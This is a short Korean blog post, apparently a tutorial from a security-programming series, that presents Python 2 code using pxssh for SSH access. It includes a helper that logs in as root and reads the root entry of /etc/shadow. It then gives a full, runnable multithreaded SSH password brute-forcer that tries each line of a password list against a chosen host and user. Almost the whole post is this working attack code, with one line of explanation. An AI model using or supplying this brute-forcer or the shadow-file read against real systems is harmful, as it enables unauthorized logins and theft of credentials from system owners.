def send_command(s, cmd):
s.sendline(cmd)
s.prompt()
print s.before
def connect(host, user, password):
try:
s = pxssh.pxssh()
s.login(host, user, password)
return s
except:
print '[-] Error Connecting'
exit(0)
s = connect('127.0.0.1', 'root', 'toor')
send_command(s, 'cat /etc/shadow | grep root')
Pxssh로 SSH 패스워드 공격하기
login() 함수가 예외가 없이 성공하면 패스워드를 찾았다는 메세지 출력 그렇지 않으면 예외를 처리
import pxssh
import optparse
import time
from threading import *
maxConnections = 5
connection_lock = BoundedSemaphore(value=maxConnections)
Found = False
Fails = 0
def connect(host, user, password, release):
global Found
global Fails
try:
s = pxssh.pxssh()
s.login(host, user, password)
print '[+] Password Found: ' + password
Found = True
except Exception, e:
if 'read_nonblocking' in str(e):
Fails += 1
time.sleep(5)
connect(host, user, password, False)
elif 'synchronize with original prompt' in str(e):
time.sleep(1)
connect(host, user, password, False)
finally:
if release: connection_lock.release()
def main():
parser = optparse.OptionParser('usage%prog '+\
'-H <target host> -u <user> -F <password list>')
parser.add_option('-H', dest='tgtHost', type = 'string',\
help='specify target host')
parser.add_option('-F', dest='passwdFile', type = 'string',\
help='specigy password file')
parser.add_option('-u', dest='user', type='string',\
help='specify the user')
(options, args) = parser.parse_args()
host = options.tgtHost
passwdFile = options.passwdFile
user = options.user
if host == None or passwdFile == None or user == None:
print parser.usage
exit(0)
fn = open(passwdFile, 'r')
for line in fn.readlines():
if Found:
print '[*] Exiting: Password Found'
exit(0)
if Fails > 5:
print '[!] Exting: Too Many Socket Timeouts'
exit(0)
connection_lock.acquire()
password = line.strip('\r').strip('\n')
print '[-] Testing: '+ str(password)
t = Thread(target=connect, args=(host, user,\
password, True))
child = t.start()
if __name__ == '__main__':
main()
'컴퓨터 > Python' 카테고리의 다른 글
Pexpect로 SSH 연결하기 (0) | 2013.08.17 |
---|---|
nmap 포트 스캐너 통합하기 (0) | 2013.08.13 |
포트 스캐너 (0) | 2013.08.12 |
압축 파일의 패스워드 찾기 (0) | 2013.08.10 |
압축파일에 잘못된 패스워드를 입력 (0) | 2013.08.09 |